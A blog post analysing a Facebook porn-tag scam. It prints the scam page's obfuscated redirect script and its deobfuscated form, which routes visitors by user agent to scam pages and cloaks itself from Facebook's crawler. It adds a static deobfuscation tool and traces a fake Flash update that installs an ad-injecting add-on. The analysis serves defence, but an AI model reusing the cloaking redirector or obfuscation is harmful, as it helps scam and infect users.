Porn virus on Facebook

Recently I've seen various posts on Facebook where a person is tagged in a porn video or porn photo. This is a scam that targets several desktop and mobile operating systems and several browsers. Clicking on the post opens an external page like the one in the screenshot below:

Facebook Virus

 

In a Linux VM I opened the link and looked at the page's source code, which turned out to be obfuscated. This is the original code:

<Script Language='Javascript'>
<!-- HTML Encryption provided by iWEBTOOL.com -->
<!--
document.write(unescape('%0A%0A%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%2F%2F%20%3C%21%5B%43%44%41%54%41%5B%0A%69%66%20%28%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%41%6E%64%72%6F%69%64%27%29%20%21%3D%20%2D%31%29%20%29%20%7B%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%68%74%74%70%3A%2F%2F%76%69%64%65%6F%33%36%34%37%33%32%73%2E%73%33%2D%77%65%62%73%69%74%65%2D%75%73%2D%65%61%73%74%2D%31%2E%61%6D%61%7A%6F%6E%61%77%73%2E%63%6F%6D%2F%73%2E%68%74%6D%6C%22%3B%0A%7D%20%2F%2F%20%5D%5D%3E%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%6A%61%76%61%73%63%72%69%70%74%3E%0A%69%66%28%28%6E%61%76%69%67%61%74%6F%72%5B%22%5C%78%37%35%5C%78%37%33%5C%78%36%35%5C%78%37%32%5C%78%34%31%5C%78%36%37%5C%78%36%35%5C%78%36%45%5C%78%37%34%22%5D%5B%22%5C%78%36%44%5C%78%36%31%5C%78%37%34%5C%78%36%33%5C%78%36%38%22%5D%28%2F%69%50%68%6F%6E%65%2F%69%29%29%7C%7C%28%6E%61%76%69%67%61%74%6F%72%5B%22%5C%78%37%35%5C%78%37%33%5C%78%36%35%5C%78%37%32%5C%78%34%31%5C%78%36%37%5C%78%36%35%5C%78%36%45%5C%78%37%34%22%5D%5B%22%5C%78%36%44%5C%78%36%31%5C%78%37%34%5C%78%36%33%5C%78%36%38%22%5D%28%2F%69%50%6F%64%2F%69%29%29%29%7B%6C%6F%63%61%74%69%6F%6E%5B%22%5C%78%37%32%5C%78%36%35%5C%78%37%30%5C%78%36%43%5C%78%36%31%5C%78%36%33%5C%78%36%35%22%5D%28%22%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%37%36%5C%78%36%39%5C%78%36%34%5C%78%36%35%5C%78%36%46%5C%78%33%33%5C%78%33%36%5C%78%33%34%5C%78%33%37%5C%78%33%33%5C%78%33%32%5C%78%37%33%5C%78%32%45%5C%78%37%33%5C%78%33%33%5C%78%32%44%5C%78%37%37%5C%78%36%35%5C%78%36%32%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%36%35%5C%78%32%44%5C%78%37%35%5C%78%37%33%5C%78%32%44%5C%78%36%35%5C%78%36%31%5C%78%37%33%5C%78%37%34%5C%78%32%44%5C%78%33%31%5C%78%32%45%5C%78%36%31%5C%78%36%44%5C%78%36%31%5C%78%37%41%5C%78%36%46%5C%78%36%45%5C%78%36%31%5C%78%37%37%5C%78%37%33%5C%78%
32%45%5C%78%36%33%5C%78%36%46%5C%78%36%44%5C%78%32%46%5C%78%37%33%5C%78%32%45%5C%78%36%38%5C%78%37%34%5C%78%36%44%5C%78%36%43%22%29%7D%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%20%3C%62%6F%64%79%3E%0A%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%0A%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%5B%22%5C%78%36%31%5C%78%37%30%5C%78%37%30%5C%78%35%36%5C%78%36%35%5C%78%37%32%5C%78%37%33%5C%78%36%39%5C%78%36%46%5C%78%36%45%22%5D%5B%22%5C%78%36%39%5C%78%36%45%5C%78%36%34%5C%78%36%35%5C%78%37%38%5C%78%34%46%5C%78%36%36%22%5D%28%22%5C%78%35%37%5C%78%36%39%5C%78%36%45%22%29%21%3D%20%2D%31%29%7B%77%69%6E%64%6F%77%5B%22%5C%78%36%43%5C%78%36%46%5C%78%36%33%5C%78%36%31%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%22%5D%3D%22%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%37%33%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%37%33%5C%78%33%33%5C%78%32%45%5C%78%36%31%5C%78%36%44%5C%78%36%31%5C%78%37%41%5C%78%36%46%5C%78%36%45%5C%78%36%31%5C%78%37%37%5C%78%37%33%5C%78%32%45%5C%78%36%33%5C%78%36%46%5C%78%36%44%5C%78%32%46%5C%78%37%36%5C%78%36%39%5C%78%36%34%5C%78%36%35%5C%78%36%46%5C%78%33%33%5C%78%33%36%5C%78%33%34%5C%78%33%37%5C%78%33%33%5C%78%33%32%5C%78%37%33%5C%78%32%46%5C%78%37%32%5C%78%36%35%5C%78%36%34%5C%78%32%45%5C%78%36%38%5C%78%37%34%5C%78%36%44%5C%78%36%43%22%7D%3B%0A%0A%0A%0A%3C%2F%73%63%72%69%70%74%3E%0A%0A%3C%73%63%72%69%70%74%3E%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%5B%22%5C%78%37%35%5C%78%37%33%5C%78%36%35%5C%78%37%32%5C%78%34%31%5C%78%36%37%5C%78%36%35%5C%78%36%45%5C%78%37%34%22%5D%5B%22%5C%78%36%39%5C%78%36%45%5C%78%36%34%5C%78%36%35%5C%78%37%38%5C%78%34%46%5C%78%36%36%22%5D%28%22%5C%78%34%36%5C%78%36%39%5C%78%37%32%5C%78%36%35%5C%78%36%36%5C%78%36%46%5C%78%37%38%22%29%21%3D%20%2D%31%29%7B%77%69%6E%64%6F%77%5B%22%5C%78%36%43%5C%78%36%46%5C%78%36%33%5C%78%36%31%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%22%5D%3D%22%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%37%36%5C
%78%36%39%5C%78%36%34%5C%78%36%35%5C%78%36%46%5C%78%33%33%5C%78%33%36%5C%78%33%34%5C%78%33%37%5C%78%33%33%5C%78%33%32%5C%78%37%33%5C%78%32%45%5C%78%37%33%5C%78%33%33%5C%78%32%44%5C%78%37%37%5C%78%36%35%5C%78%36%32%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%36%35%5C%78%32%44%5C%78%37%35%5C%78%37%33%5C%78%32%44%5C%78%36%35%5C%78%36%31%5C%78%37%33%5C%78%37%34%5C%78%32%44%5C%78%33%31%5C%78%32%45%5C%78%36%31%5C%78%36%44%5C%78%36%31%5C%78%37%41%5C%78%36%46%5C%78%36%45%5C%78%36%31%5C%78%37%37%5C%78%37%33%5C%78%32%45%5C%78%36%33%5C%78%36%46%5C%78%36%44%5C%78%32%46%5C%78%36%44%5C%78%36%36%5C%78%33%34%5C%78%33%30%5C%78%32%45%5C%78%36%38%5C%78%37%34%5C%78%36%44%5C%78%36%43%22%7D%65%6C%73%65%20%7B%69%66%28%6E%61%76%69%67%61%74%6F%72%5B%22%5C%78%37%35%5C%78%37%33%5C%78%36%35%5C%78%37%32%5C%78%34%31%5C%78%36%37%5C%78%36%35%5C%78%36%45%5C%78%37%34%22%5D%5B%22%5C%78%36%39%5C%78%36%45%5C%78%36%34%5C%78%36%35%5C%78%37%38%5C%78%34%46%5C%78%36%36%22%5D%28%22%5C%78%34%36%5C%78%36%31%5C%78%36%33%5C%78%36%35%5C%78%36%32%5C%78%36%46%5C%78%36%46%5C%78%36%42%5C%78%32%30%5C%78%34%32%5C%78%36%46%5C%78%37%34%22%29%21%3D%20%2D%31%29%7B%77%69%6E%64%6F%77%5B%22%5C%78%36%43%5C%78%36%46%5C%78%36%33%5C%78%36%31%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%22%5D%3D%22%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%36%37%5C%78%36%46%5C%78%36%46%5C%78%36%37%5C%78%36%43%5C%78%36%35%5C%78%32%45%5C%78%36%33%5C%78%36%46%5C%78%36%44%5C%78%32%46%22%7D%65%6C%73%65%20%7B%69%66%28%6E%61%76%69%67%61%74%6F%72%5B%22%5C%78%37%35%5C%78%37%33%5C%78%36%35%5C%78%37%32%5C%78%34%31%5C%78%36%37%5C%78%36%35%5C%78%36%45%5C%78%37%34%22%5D%5B%22%5C%78%36%39%5C%78%36%45%5C%78%36%34%5C%78%36%35%5C%78%37%38%5C%78%34%46%5C%78%36%36%22%5D%28%22%5C%78%34%33%5C%78%36%38%5C%78%37%32%5C%78%36%46%5C%78%36%44%5C%78%36%35%22%29%21%3D%20%2D%31%29%7B%7D%65%6C%73%65%20%7B%77%69%6E%64%6F%77%5B%22%5C%78%36%43%5C%78%36%46%5C%78%36%33%5C%78%36%31%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%22%5D%3
D%22%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%37%36%5C%78%36%39%5C%78%36%34%5C%78%36%35%5C%78%36%46%5C%78%33%33%5C%78%33%36%5C%78%33%34%5C%78%33%37%5C%78%33%33%5C%78%33%32%5C%78%37%33%5C%78%32%45%5C%78%37%33%5C%78%33%33%5C%78%32%44%5C%78%37%37%5C%78%36%35%5C%78%36%32%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%36%35%5C%78%32%44%5C%78%37%35%5C%78%37%33%5C%78%32%44%5C%78%36%35%5C%78%36%31%5C%78%37%33%5C%78%37%34%5C%78%32%44%5C%78%33%31%5C%78%32%45%5C%78%36%31%5C%78%36%44%5C%78%36%31%5C%78%37%41%5C%78%36%46%5C%78%36%45%5C%78%36%31%5C%78%37%37%5C%78%37%33%5C%78%32%45%5C%78%36%33%5C%78%36%46%5C%78%36%44%5C%78%32%46%5C%78%37%33%5C%78%32%45%5C%78%36%38%5C%78%37%34%5C%78%36%44%5C%78%36%43%22%7D%7D%7D%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%62%6F%64%79%3E'));
//-->
</Script>

 

So it is not really "encrypted", since there is no key. The method simply replaces every ASCII character with a %XX escape of its hexadecimal value and hands the result to unescape() inside document.write(); inside the decoded script the strings are hidden a second time as \xNN JavaScript escapes (for example "\x75\x73\x65\x72\x41\x67\x65\x6E\x74" is just "userAgent"). Using an online tool such as DDecode, the page's code deobfuscates to this:

<script type="text/javascript"> // <![CDATA[
if ( (navigator.userAgent.indexOf('Android') != -1) ) {
document.location = "http://video364732s.s3-website-us-east-1.amazonaws.com/s.html";
} // ]]>
</script>
<script language=javascript>
if((navigator["userAgent"]["match"](/iPhone/i))||(navigator["userAgent"]["match"](/iPod/i))){
location["replace"]("http://video364732s.s3-website-us-east-1.amazonaws.com/s.html")};
</script> 
<body>
<script type="text/javascript">
if(navigator["appVersion"]["indexOf"]("Win")!= -1){
window["location"]="https://s3.amazonaws.com/video364732s/red.html"
};
</script>
<script>
if(navigator["userAgent"]["indexOf"]("Firefox")!= -1){
window["location"]="http://video364732s.s3-website-us-east-1.amazonaws.com/mf40.html"
}else {
if(navigator["userAgent"]["indexOf"]("Facebook Bot")!= -1){
window["location"]="http://google.com/"
}else {
if(navigator["userAgent"]["indexOf"]("Chrome")!= -1){}else {
window["location"]="http://video364732s.s3-website-us-east-1.amazonaws.com/s.html"
}
}
};
</script>
</body>

 

As you can see, the script fingerprints the visitor through navigator.userAgent and navigator.appVersion and sends each platform to a different landing page: Android and iPhone/iPod go to s.html, Windows to red.html and Firefox to mf40.html, while Chrome is left alone and any other browser falls through to s.html. The checks run one after another and, in practice, the last assignment to window.location wins, so a Firefox user on Windows ends up on the Firefox page. Notice also how they try to hide from Facebook's link crawler: a user agent containing "Facebook Bot" is redirected to google.com, so the preview Facebook generates for the post points at something harmless.
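Instead of pasting a sample into an online tool (which leaks the sample and, for anything nastier than this, the fact that you are looking at it), the two layers described above can be peeled off statically. The following is an added example, not code from the original post or from the scammers: it strips the document.write(unescape('...')) wrapper, decodes the %XX layer, decodes the \xNN string escapes underneath, and then lists every redirect together with the user-agent test that guards it, so the cloaking of "Facebook Bot" shows up in the output. Nothing is eval'd. The sample it runs on is constructed to mirror the page's logic (same hostnames and paths, same \x-escaped identifiers) but is not the original payload byte for byte; the wrapper is rebuilt with a three-line re-implementation of the iWEBTOOL encoding rather than copied.

```javascript
// Added example (not from the original post): static deobfuscation of the
// iWEBTOOL-style "HTML encryption" and the \xNN escapes beneath it, plus a
// guard -> URL listing of the redirects. Nothing is executed.

// Layer 2 of the constructed sample: the decoded script with its \xNN-escaped
// strings. Hostnames/paths are the ones from the page; the layout is condensed.
const INNER_SCRIPT = String.raw`<script>
if ( (navigator.userAgent.indexOf('Android') != -1) ) {
document.location = "http://video364732s.s3-website-us-east-1.amazonaws.com/s.html";
}
</script>
<script>
if((navigator["\x75\x73\x65\x72\x41\x67\x65\x6E\x74"]["\x6D\x61\x74\x63\x68"](/iPhone/i))){location["\x72\x65\x70\x6C\x61\x63\x65"]("http://video364732s.s3-website-us-east-1.amazonaws.com/s.html")};
</script>
<script>
if(navigator["\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E"]["\x69\x6E\x64\x65\x78\x4F\x66"]("\x57\x69\x6E")!= -1){window["\x6C\x6F\x63\x61\x74\x69\x6F\x6E"]="https://s3.amazonaws.com/video364732s/red.html"};
</script>
<script>
if(navigator["\x75\x73\x65\x72\x41\x67\x65\x6E\x74"]["\x69\x6E\x64\x65\x78\x4F\x66"]("\x46\x69\x72\x65\x66\x6F\x78")!= -1){window["\x6C\x6F\x63\x61\x74\x69\x6F\x6E"]="http://video364732s.s3-website-us-east-1.amazonaws.com/mf40.html"}else {if(navigator["\x75\x73\x65\x72\x41\x67\x65\x6E\x74"]["\x69\x6E\x64\x65\x78\x4F\x66"]("\x46\x61\x63\x65\x62\x6F\x6F\x6B\x20\x42\x6F\x74")!= -1){window["\x6C\x6F\x63\x61\x74\x69\x6F\x6E"]="\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2F"}else {if(navigator["\x75\x73\x65\x72\x41\x67\x65\x6E\x74"]["\x69\x6E\x64\x65\x78\x4F\x66"]("\x43\x68\x72\x6F\x6D\x65")!= -1){}else {window["\x6C\x6F\x63\x61\x74\x69\x6F\x6E"]="http://video364732s.s3-website-us-east-1.amazonaws.com/s.html"}}};
</script>`;

// The iWEBTOOL "encryption": every character becomes %XX. No key involved.
// (ASCII only; escape() would emit %uXXXX for wider characters.)
function percentEncodeAll(text) {
  return Array.from(text, (ch) =>
    '%' + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
}

// Layer 1 of the constructed sample: the wrapper exactly as the tool emits it.
const OBFUSCATED_SAMPLE = [
  "<Script Language='Javascript'>",
  '<!-- HTML Encryption provided by iWEBTOOL.com -->',
  '<!--',
  `document.write(unescape('${percentEncodeAll(INNER_SCRIPT)}'));`,
  '//-->',
  '</Script>',
].join('\n');

// %XX -> character: all unescape() does for ASCII input, without calling it.
function percentDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Pull the payload out of document.write(unescape('...')) without running it.
function unwrapDocumentWrite(html) {
  const m = /document\.write\(\s*unescape\(\s*(['"])([^'"]*)\1\s*\)\s*\)/.exec(html);
  if (!m) throw new Error('no document.write(unescape(...)) wrapper found');
  return percentDecode(m[2]);
}

// \xNN -> character. Applied to the whole text rather than only inside string
// literals: fine for reading the sample, not a faithful JavaScript parse.
function decodeHexEscapes(js) {
  return js.replace(/\\x([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Walk the decoded script in order: every indexOf("X") / match(/X/) sets the
// current guard, an `else` negates it, and each URL is recorded under the guard
// in force at that point. Handles both `.indexOf('X')` and `["indexOf"]("X")`.
const TOKEN = /(?:indexOf|match)["']?\]?\(\s*(?:["']([^"']+)["']|\/([^\/]+)\/[a-z]*)\s*\)|(https?:\/\/[^"'\s)]+)|(\belse\b)/g;

function extractRedirects(js) {
  const redirects = [];
  let guard = null;
  for (const m of js.matchAll(TOKEN)) {
    if (m[1] !== undefined || m[2] !== undefined) guard = m[1] ?? m[2];
    else if (m[4]) guard = guard === null ? null : `not ${guard}`;
    else if (m[3]) redirects.push({ when: guard ?? 'unconditional', url: m[3] });
  }
  return redirects;
}

// Both layers off, then the redirect table.
function deobfuscate(html) {
  const source = decodeHexEscapes(unwrapDocumentWrite(html));
  return { source, redirects: extractRedirects(source) };
}

// Stand-alone run: print guard -> URL for the sample.
for (const r of deobfuscate(OBFUSCATED_SAMPLE).redirects) {
  console.log(`${r.when.padEnd(14)} -> ${r.url}`);
}
```

Run it with node and the table reads Android, iPhone, Win, Firefox, Facebook Bot and "not Chrome" on the left with the matching amazonaws.com and google.com URLs on the right; the google.com row is the crawler cloaking. The guard tracking is deliberately simple (nearest preceding test, negated by an `else`), which is enough for this flat if/else chain but would need a real parser for anything with nested conditions on the same line.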

I followed the link (the Firefox one) and it landed me on a well-made fake YouTube page saying that Adobe Flash had crashed and that I should update it. Scammers really care about their users.

fake youtube page

Oh noes, Flash has crashed! 🙁

 

Clicking on the inviting blue button redirects the user to a Firefox extension download. Firefox's "Untrusted connection" protection warned me that the SSL certificate was indeed not valid, and I confirmed the security exception (a really nasty thing to do).
Extracting the .xpi reveals an ad-injecting add-on.

If I find out how to remove this virus, I will update the post.

For now that’s it!